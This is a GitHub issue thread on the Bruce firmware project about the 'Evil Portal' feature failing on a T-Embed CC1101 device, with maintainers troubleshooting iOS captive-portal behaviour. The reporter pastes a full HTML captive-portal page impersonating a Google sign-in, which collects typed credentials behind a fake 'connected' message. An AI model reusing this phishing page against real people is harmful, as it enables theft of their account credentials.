BruceDevices/firmware #1025: Evil Portal not working on t-embed cc1101

Enrique956, 2025-04-01:
**Describe the bug:**

**Steps To Reproduce:**

- Device used: t embed cc1101

**Expected behavior:**

**Actual behavior:**

**Additional context / logs:**

[image]

[image]

Enrique956, 2025-04-01:
describe the bug= evil portal not working as expected

expected behavior = evil portal html working fine 

what actually happend= html error code on wifi -photos attached .

bmorcelli, 2025-04-01:
Can you test the Beta version, please?
And if the error persists, send your .html (in .txt) file

Enrique956, 2025-04-01:
I already tested the latest and beta firmware for bruce, I will send the html file.

`
<!DOCTYPE html>
<html>
<head>
  <title>Sign in: Google Accounts</title>
  <meta charset='UTF-8'>
  <meta name='viewport' content='width=device-width, initial-scale=1.0'>
  <style>
    a:hover{
      text-decoration: underline;
    }
    body{
      font-family: Arial, sans-serif;
      align-items: center;
      justify-content: center;
      background-color: #FFFFFF;
    }
    input[type='text'], input[type='password']{
      width: 100%;
      padding: 12px 10px;
      margin: 8px 0;
      box-sizing: border-box;
      border: 1px solid #cccccc;
      border-radius: 4px;
    }
    .container{
      margin: auto;
      padding: 20px;
      max-width: 700px;
    }
    .logo-container{
      text-align: center;
      margin-bottom: 30px;
      display: flex;
      justify-content: center;
      align-items: center;
    }
    .logo{
      width: 40px;
      height: 40px;
      fill: #FFC72C;
      margin-right: 100px;
    }
    .company-name{
      font-size: 42px;
      color: black;
      margin-left: 0px;
    }
    .form-container{
      background: #FFFFFF;
      border: 1px solid #CEC0DE;
      border-radius: 4px;
      padding: 20px;
      box-shadow: 0px 0px 10px 0px rgba(108, 66, 156, 0.2);
    }
    h1{
      text-align: center;
      font-size: 28px;
      font-weight: 500;
      margin-bottom: 20px;
    }
    .input-field{
      width: 100%;
      padding: 12px;
      border: 1px solid #BEABD3;
      border-radius: 4px;
      margin-bottom: 20px;
      font-size: 14px;
[... 112 lines cut ...]
          </div>
        </form>
      </div>
      <div id='success-block'>
        <center>
          <div>Connected successfully. </br>You will be redirected shortly.</div>
        </center>
      </div>
    </div>
  </div>

  <script>
    document.getElementById('login-form').addEventListener('submit', function(event) {
      event.preventDefault();

      document.getElementById('success-block').style.display = 'flex';
      document.getElementById('form-block').style.display = 'none';

      setTimeout(function() {
        document.getElementById('login-form').submit();
      }, 3000);
    });
  </script>
</body>
</html>`

Enrique956, 2025-04-02:
[image]

[image]

IncursioHack, 2025-04-02:
I won't pass it off as the truth, especially since I don't have an iPhone or Lilygo (I have Android + Cardputer <3). Looking at the error message on your iOS and the "captive.apple.com", is there a possibility that your iPhone detected Bruce's Captive Portal and blocked it?

I'm trying to understand your case, but it's very specific and we haven't found any similar reports.

If you have an Android nearby, could you test the same wifi/html on Android?

Could you also disconnect your iPhone from the 5G internet and keep only the Wifi for testing?

IncursioHack, 2025-04-02:
https://discussions.apple.com/thread/7681570?sortBy=rank

Enrique956, 2025-04-02:
But when I use the default HTML it works tho